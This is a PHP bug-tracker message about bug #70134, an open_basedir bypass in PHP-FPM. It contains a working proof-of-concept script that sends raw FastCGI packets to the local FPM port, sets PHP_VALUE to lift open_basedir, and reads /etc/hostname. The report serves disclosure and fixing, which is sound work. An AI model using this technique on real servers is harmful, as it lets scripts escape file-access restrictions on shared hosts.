Sec Bug->Bug #70134 [Opn]: open_basedir bypass with IP-based PHP-FPM

From: Date: Mon, 12 Jul 2021 15:41:04 +0000
Subject: Sec Bug->Bug #70134 [Opn]: open_basedir bypass with IP-based PHP-FPM
References: 1  Groups: php.bugs 
Request: Send a blank email to php-bugs+get-234983@lists.php.net to get a copy of this message
Edit report at https://bugs.php.net/bug.php?id=70134&edit=1 ID: 70134 Updated by: cmb@php.net Reported by: butesa at freenet dot de Summary: open_basedir bypass with IP-based PHP-FPM Status: Open -Type: Security +Type: Bug Package: FPM related Operating System: Ubuntu PHP Version: 5.5.27 Block user comment: N Private report: N New Comment: open_basedir bypasses are not considered to be security issues; cf. <https://externals.io/message/105606> and <https://externals.io/message/115406>. Previous Comments: ------------------------------------------------------------------------ [2020-01-14 21:45:51] diego dot blanco at treitos dot com Additionally it seems that open_basedir is bypassed by fsocksopen when using unix sockets, so this is also exploitable with unix sockets. ------------------------------------------------------------------------ [2018-01-19 19:40:51] bohu at cryp dot email This critical security issue is still present in PHP 7.0. At least on Debian Stretch PHP 7.0.27-0+deb9u1. Any plan to patch it ? Thx ! ------------------------------------------------------------------------ [2017-04-19 10:03:39] xuanhung1606 at gmail dot com http://tnghomes.net/ ------------------------------------------------------------------------ [2015-07-24 20:46:27] butesa at freenet dot de Sorry, I didn't mean to make this bug report private. There is no sensible information in it. ------------------------------------------------------------------------ [2015-07-24 20:41:55] butesa at freenet dot de Description: ------------ Please change the implementation of PHP_VALUE so that open_basedir can only be tightened, but not loosened (as it is already implemented with ini_set()). At the moment, you can bypass open_basedir by connecting to the FPM port. Test script: --------------- <?php echo 'START '; echo ini_get('open_basedir'); echo file_get_contents('/etc/hostname'); echo ' END'; echo '<br/>'; if (isset($_GET['stop'])) exit; $params = array(); $params['SCRIPT_NAME'] = $_SERVER['SCRIPT_NAME']; $params['SCRIPT_FILENAME'] = $_SERVER['SCRIPT_FILENAME']; $params['REQUEST_METHOD'] = 'GET'; $params['QUERY_STRING'] = 'stop=true'; $params['PHP_VALUE'] = 'open_basedir=/'; $params_encoded = ''; foreach ($params as $k=>$v) { $params_encoded.= chr(strlen($k)).chr(strlen($v)).$k.$v; } $len = strlen($params_encoded); $len_encoded = chr($len >> 8).chr($len & 255); $fp = fsockopen('127.0.0.1',9000); fwrite($fp, "\x01\x01\x00\x01\x00\x08\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00"); fwrite($fp, "\x01\x04\x00\x01".$len_encoded."\x00\x00".$params_encoded); fwrite($fp, "\x01\x04\x00\x01\x00\x00\x00\x00"); fwrite($fp, "\x01\x05\x00\x01\x00\x00\x00\x00"); sleep(2); $result = ''; while (!feof($fp)) { $result .= fread($fp, 1024); } fclose($fp); $matches = array(); preg_match('/START.*END/s', $result, $matches); echo $matches[0]; Expected result: ---------------- [shortened for better readability] START /var/www/html/ Warning: file_get_contents(): open_basedir restriction in effect. END START /var/www/html/ Warning: file_get_contents(): open_basedir restriction in effect. END Actual result: -------------- START /var/www/html/ Warning: file_get_contents(): open_basedir restriction in effect. END START / my_hostname END Don't be surprised, you may also encounter bug 63965. In that case, the output will look like this: START / my_hostname END START / my_hostname END ------------------------------------------------------------------------ -- Edit this bug report at https://bugs.php.net/bug.php?id=70134&edit=1

« previous php.bugs (#234983) next »